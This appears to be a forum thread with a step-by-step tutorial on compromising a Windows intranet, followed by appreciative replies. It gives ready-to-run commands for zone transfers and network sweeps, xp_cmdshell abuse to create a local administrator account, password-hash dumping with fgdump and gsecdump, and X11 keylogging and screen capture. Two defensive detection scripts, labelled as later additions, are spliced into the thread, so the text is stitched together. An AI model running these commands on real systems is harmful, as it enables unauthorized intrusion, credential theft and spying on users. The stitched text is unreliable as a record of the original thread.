Thread: Tutorial : Intranet Exploitation

  1. #1
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default Tutorial : Intranet Exploitation

    This tutorial will demonstrate how to gain Domain Administrator on a typical Windows intranet through common security oversights. Most of these tools are Windows-based, but may run in Wine. Please post if you can verify this, or if you know a Linux equivalent tool.

    Discovery

    Obviously start with the network you've been DHCP'd.

    NET VIEW command

    Displays a list of computers in a specified workgroup or the shared resources available on a specified computer.

    [\\computername [/CACHE] | /DOMAIN[:domainname]]

    Code:
    NET VIEW /NETWORK:NW [\\computername]

    Domain Zone Transfers

    Starting with the DNS servers you DHCP'd with, try zone transfers. If successful, extrapolate Class C (/24) networks from the individual IP addresses.

    Code:
    dig @ns1.example.com example.com axfr

    Nmap scanning

    Perform a ping sweep of the network range.

    Code:
    nmap -sP -v xx.xx.xx.xx/24 > ping_results.txt

    Clean up the ping sweep.

    Code:
    cat ping_results.txt | grep -i 'up' | cut --delimiter=" " -f 2 > ping_results_final.txt

    Generate an IP list from the known net ranges.

    Code:
    gping xx.xx.0.255 >> iplist.txt
    gping xx.xx.0.255 >> iplist.txt

    gping may be found here:
    http://forums.remote-exploit.org/showthread.php?t=11988

    Exploitation

    SQL Discovery and Exploitation

    A common entry point to a network is through insecure SQL servers. SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. It also adds brute-force password capabilities and the ability to brute-force multiple instances.

    It can be found here:

    http://www.sqlsecurity.com/Tools/Fre...5/Default.aspx

    Once you have found a weak SA account, use the command-line OSQL tool found bundled with MSDE. This is the syntax to create an account and promote it to a local administrator:
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net user pwnd pwndABC123 /add'"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net localgroup administrators pwnd /add'"

    With newer releases of SQL, you may find that the xp command shell has been disabled. Thoughtfully, Microsoft allows you to re-enable this feature!
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'show advanced options', 1"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'xp_cmdshell', 1"

    As a local administrator, you can now dump the HASHES for the local workstation. Use FGDump, found here:

    http://swamp.foofus.net/fizzgig/fgdump/downloads.htm

    Syntax:
    fgdump -h %hostname% -u pwnd -p pwndABC123

    If FGDump doesn't work, try GSECDump, found here:

    http://www.truesec.com/PublicStore/c...ookieSupport=1

    GSECDump should be used with psexec, found here:
    http://technet.microsoft.com/en-us/s.../bb897553.aspx

    Syntax:
    psexec \\%hostname% -u pwnd -p pwndABC123 -s -f -c gsecdump.exe -s


    X11 exploitation

    If your nmap scans reveal ports 6000-6005 being open, chances are you may be dealing with the X11 protocol (X Windows). X11 is plain-text and can be keylogged and remotely viewed. You will need the NSAT (Network Security Analysis Tool), which can be found here:

    http://forums.remote-exploit.org/showthread.php?t=12312

    You may find that the tool does not complete a make. Download my fixed version towards the bottom of the post.

    Filter your nmap results to only show ports 6000-6005 and copy the results into a text file. NSAT will scan the hosts in this text file. Syntax:

    nsat -C nsat_X.conf -n -f iplist.txt

    The results should show something similar to this:

    [port] 10.1.1.1 - X Windows
    [port] 10.1.1.2 - dumpable/sniffable

    Target the IPs that are "dumpable/sniffable" with XSpy, found here:

    http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html

    Syntax:

    ./xspy 10.1.1.2:0

    You should now be keylogging this session. If you want to view the actual desktop of the user, use xwatchwin, found here:

    ftp://ftp.x.org/contrib/utilities/

    Syntax:

    ./xwatchwin 10.1.1.2:0

    FTP exploitation

    Utilizing NSAT, filter your nmap results for port 21. Take this IP list and run it through NSAT.
    Syntax:
    nsat -C nsat_FTP.conf -n -f iplist.txt

    The results should show something similar to this:

    10.1.1.1 - anonymous login
    10.1.1.2 - anonymous login


    Share Enumeration

    A common security flaw occurs when users define file shares with lax security, allowing unauthorized users to see sensitive files. ShareEnum looks for these open shares on the network. You can find it here:

    http://www.microsoft.com/technet/sys...shareenum.mspx

    NetworkSleuth is a network file searching utility that allows you to quickly locate files across a network. You can search for specific file names or for specific file types (e.g. files named/containing "password"). Get it here:

    http://www.nsauditor.com/network_sleuth.html

    I hope this helps some of you with your pen-testing endeavors. Please add to this tutorial with your own methodologies.

    William
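The "Domain Zone Transfers" step above works only when the authoritative server answers AXFR for anyone. On the defender's side the fix is to restrict transfers to the real secondaries (BIND's `allow-transfer` directive) and to watch the transfer log for requests from anything else. The script below is an added example, not code from the original post: it parses constructed log lines modelled on BIND's `xfer-out` messages and reports every AXFR that started from a host outside a hypothetical allow list.

```python
"""Flag zone-transfer (AXFR) requests in BIND logs that come from addresses
outside the secondary-server allow list.

Added example for the 'Domain Zone Transfers' step; not part of the original
post. The log lines are constructed (modelled on BIND's xfer-out messages) and
the allow list and addresses are hypothetical."""
import ipaddress
import re

# Hosts legitimately allowed to pull the zone (hypothetical secondaries).
ALLOWED_SECONDARIES = [ipaddress.ip_network("10.1.0.53/32"),
                       ipaddress.ip_network("10.1.0.54/32")]

# Captures the client address and zone from "transfer of '<zone>/IN': AXFR started".
# The optional "@0x..." token covers newer BIND versions that log a client handle.
AXFR_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+.*?"
    r"transfer of '(?P<zone>[^/']+)/IN': AXFR started")

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = """\
27-Feb-2010 10:15:02.123 xfer-out: info: client 10.1.0.53#41234 (example.com): transfer of 'example.com/IN': AXFR started
27-Feb-2010 10:15:09.870 xfer-out: info: client 10.1.7.200#51002 (example.com): transfer of 'example.com/IN': AXFR started
27-Feb-2010 10:15:10.001 xfer-out: info: client 10.1.7.200#51002 (example.com): transfer of 'example.com/IN': AXFR ended
27-Feb-2010 10:16:44.540 queries: info: client 10.1.7.201#3451 (www.example.com): query: www.example.com IN A +
"""


def is_allowed(ip):
    """True when the address belongs to one of the listed secondaries."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_SECONDARIES)


def find_unauthorized_axfr(log_text):
    """Return one record per AXFR started by a host that is not an allowed secondary."""
    hits = []
    for line in log_text.splitlines():
        m = AXFR_RE.search(line)
        if not m:
            continue  # ordinary queries and 'AXFR ended' lines are ignored
        if is_allowed(m["ip"]):
            continue  # a known secondary pulling the zone is normal
        hits.append({"client": m["ip"], "zone": m["zone"], "line": line})
    return hits


if __name__ == "__main__":
    for h in find_unauthorized_axfr(SAMPLE_LOG):
        print(f"ALERT zone {h['zone']} transferred to unlisted host {h['client']}")
```

Run it over a real `named` log by reading the file into `find_unauthorized_axfr`; one alert per unexpected transfer is enough, since a single successful AXFR already hands out the whole zone.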
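The SQL section above chains a weak sa password, xp_cmdshell and `net user`/`net localgroup` into a fresh local administrator. Keeping xp_cmdshell disabled and giving sa a strong password are the preventive controls; on the detection side the same chain leaves a recognisable trail in the Windows Security log: a shell whose parent is the SQL Server service process (event 4688), a new account (4720) and that account joining Administrators (4732) seconds later. The script below is an added example, not code from the original post: it correlates constructed event records shaped like exported Security-log fields (the `ParentProcessName` field assumes a Windows version that logs the creator process in 4688), with hypothetical host and account names.

```python
"""Correlate Windows Security events for the local-admin creation chain that an
xp_cmdshell 'net user ... /add' + 'net localgroup administrators ... /add'
sequence produces.

Added example, not part of the original post. The events are constructed
records shaped like exported Security-log fields; host names, SIDs and
account names are hypothetical."""
from datetime import datetime, timedelta

ADMIN_WINDOW = timedelta(minutes=10)  # creation -> admin add within this window is suspicious

# Constructed sample events (not from a real host). Times are ISO-8601 strings.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Time": "2010-02-27T10:20:01", "Computer": "WS01",
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4720, "Time": "2010-02-27T10:20:02", "Computer": "WS01",
     "TargetUserName": "pwnd", "TargetSid": "S-1-5-21-1111-2222-3333-1005",
     "SubjectUserName": "SQLSERVICE"},
    {"EventID": 4732, "Time": "2010-02-27T10:20:03", "Computer": "WS01",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1111-2222-3333-1005",
     "SubjectUserName": "SQLSERVICE"},
    # Benign noise: a helpdesk account creation and a user opening a shell.
    {"EventID": 4720, "Time": "2010-02-27T11:05:00", "Computer": "WS02",
     "TargetUserName": "jsmith", "TargetSid": "S-1-5-21-1111-2222-3333-1010",
     "SubjectUserName": "helpdesk"},
    {"EventID": 4688, "Time": "2010-02-27T11:06:00", "Computer": "WS02",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
]


def _t(ev):
    return datetime.fromisoformat(ev["Time"])


def _basename(path):
    # Last component of a Windows path, lower-cased for comparison.
    return path.rsplit("\\", 1)[-1].lower()


def shells_spawned_by_sql(events):
    """4688 events where the SQL Server service process is the parent of a shell."""
    shells = {"cmd.exe", "powershell.exe"}
    return [ev for ev in events
            if ev["EventID"] == 4688
            and _basename(ev.get("ParentProcessName", "")) == "sqlservr.exe"
            and _basename(ev.get("NewProcessName", "")) in shells]


def rapid_admin_promotions(events, window=ADMIN_WINDOW):
    """Pairs (4720, 4732) on the same host where the newly created SID joins
    Administrators within `window` of the account's creation. 4732 records the
    member by SID (the account-name field is often '-'), so correlate on SID."""
    created = {}  # (host, sid) -> 4720 event
    hits = []
    for ev in sorted(events, key=_t):
        host = ev["Computer"]
        if ev["EventID"] == 4720:
            created[(host, ev["TargetSid"])] = ev
        elif ev["EventID"] == 4732 and ev["TargetUserName"].lower() == "administrators":
            c = created.get((host, ev["MemberSid"]))
            if c is not None and _t(ev) - _t(c) <= window:
                hits.append((c, ev))
    return hits


def alerts(events):
    """Human-readable alert lines for both detections."""
    out = []
    for ev in shells_spawned_by_sql(events):
        out.append(f"{ev['Computer']}: shell spawned by sqlservr.exe (possible xp_cmdshell)")
    for c, g in rapid_admin_promotions(events):
        delay = int((_t(g) - _t(c)).total_seconds())
        out.append(f"{c['Computer']}: new account {c['TargetUserName']} added to "
                   f"Administrators {delay}s after creation")
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print("ALERT", a)
```

The two rules are deliberately independent: the parent-process rule fires on its own when xp_cmdshell is abused for anything, while the 4720/4732 correlation catches the account-creation pattern even when the commands arrive through some other path.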

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Thanks for the tutorial williamc. Officially though I have to move it to general IT because it is not based on backtrack. Nothing personal I'm just following the rules.

  3. #3
    Member s1lang's Avatar
    Join Date
    Sep 2007
    Posts
    189

    Default

    Thank you for this mate

  4. #4
    Just burned his ISO
    Join Date
    May 2008
    Posts
    20

    Default

    Thanks for the tutorial

  5. #5
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default thanks

    Ran across this, nice job thanks.

  6. #6
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.

  7. #7
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by williamc View Post
    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.
    Very nice work, brother. It's good to see that knowledge isn't just being hoarded for personal gain, but is being shared for all the right reasons. Neophytes take heed: this is the kind of example you, and even those of us more versed in the security realm, should all follow...

    I look forward to any and everything else you have to offer.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  8. #8
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Default Thanks man

    Dude...

    Thanks for sharing, well written tuts like this have me just itching to try out some new tools.

    Time to break my home network, again...

    TT

  9. #9
    Good friend of the forums
    Join Date
    Jan 2010
    Location
    outside chicago, il
    Posts
    442

    Default

    Nice work williamc. SQLPing looks interesting.

    I added a section on gsecdump to the password cracking guide.
    I like the bleeding edge, but I don't like blood loss
